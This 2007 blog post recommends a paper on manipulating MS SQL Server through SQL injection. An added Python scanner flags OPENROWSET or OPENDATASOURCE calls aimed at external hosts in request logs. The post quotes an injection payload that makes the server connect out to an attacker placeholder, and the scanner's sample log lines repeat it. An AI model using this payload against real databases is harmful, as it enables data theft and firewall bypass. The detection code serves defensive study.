Bending MS SQL Server and Greasing It Up
I just read a great article published by Application Security Inc. which gave me some good ideas for my future SQL Injection attacks. It starts like this:
select * from OPENROWSET('SQLoledb', 'uid=sa;pwd=;Network=DBMSSOCN;Address=hackersip,80;', 'select * from table')
Well, having the SQL server call home to your machine is cool enough (bye bye firewall), but the paper's author, Cesar Cerrudo, went a step further. These are the main topics covered by his paper:
- Detection of sql injection vulnerabilities
- Retrieving results from sql injection
- Elevating privileges
- Uploading files
- Getting into the internal network
- Port scanning
- Recommendations
I highly recommend "Manipulating Microsoft SQL Server Using SQL Injection".
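Seen from the defending side, the call-home query shown above leaves a recognizable trace in web server request logs. The following is an added example, not code from this post or from Cerrudo's paper: it flags requests that carry an OPENROWSET call (and, going slightly beyond the post, its sibling OPENDATASOURCE) and reports whether the Address= target lies outside the internal network. The function names, the internal ranges, the `.corp.example` suffix and the sample requests are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# OPENROWSET( / OPENDATASOURCE( in any case, optional whitespace before "(".
ADHOC_RE = re.compile(r"\b(openrowset|opendatasource)\s*\(", re.I)
# Address=<host>[,<port>] from the provider string (Network=DBMSSOCN form).
ADDR_RE = re.compile(r"\baddress\s*=\s*([^,;'\"\s)]+)(?:\s*,\s*(\d+))?", re.I)
# Assumption: these ranges count as internal; adjust to your address plan.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def normalize(raw):
    """URL-decode twice so single- and double-encoded requests compare equal."""
    return unquote_plus(unquote_plus(raw))

def inspect(raw, internal_suffixes=(".corp.example",)):
    """Return None for a clean request, else a finding for the ad hoc query."""
    text = normalize(raw)
    call = ADHOC_RE.search(text)
    if not call:
        return None
    finding = {"function": call.group(1).upper(), "target": None,
               "port": None, "external": False}
    addr = ADDR_RE.search(text, call.end())
    if addr:
        host, port = addr.group(1), addr.group(2)
        try:
            ip = ipaddress.ip_address(host)
            external = not any(ip in net for net in INTERNAL_NETS)
        except ValueError:  # hostname: external unless it has an internal suffix
            external = not host.lower().endswith(internal_suffixes)
        finding.update(target=host, port=int(port) if port else None,
                       external=external)
    return finding

def scan(lines):
    """Findings whose connection target lies outside the internal ranges."""
    return [f for f in map(inspect, lines) if f and f["external"]]

# Constructed sample requests, not taken from any real log.
SAMPLE_LOG = [
    "GET /item.asp?id=1 HTTP/1.1",
    "GET /item.asp?id=1;select+*+from+OPENROWSET('SQLoledb','uid=sa;pwd=;"
    "Network=DBMSSOCN;Address=203.0.113.10,80;','select+*+from+table') HTTP/1.1",
    "GET /item.asp?id=1%3Bselect%201%20from%20OpenRowSet(%27SQLoledb%27%2C%27"
    "Network%3DDBMSSOCN%3BAddress%3D10.1.2.3%2C1433%3B%27%2C%27select%201%27)",
]
```

Calling `scan(SAMPLE_LOG)` returns only the request whose target is outside the listed ranges; `inspect` also reports internal targets so they can be reviewed separately.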
This entry was posted on Sunday, March 4th, 2007 and is filed under Sql Injection, Articles.

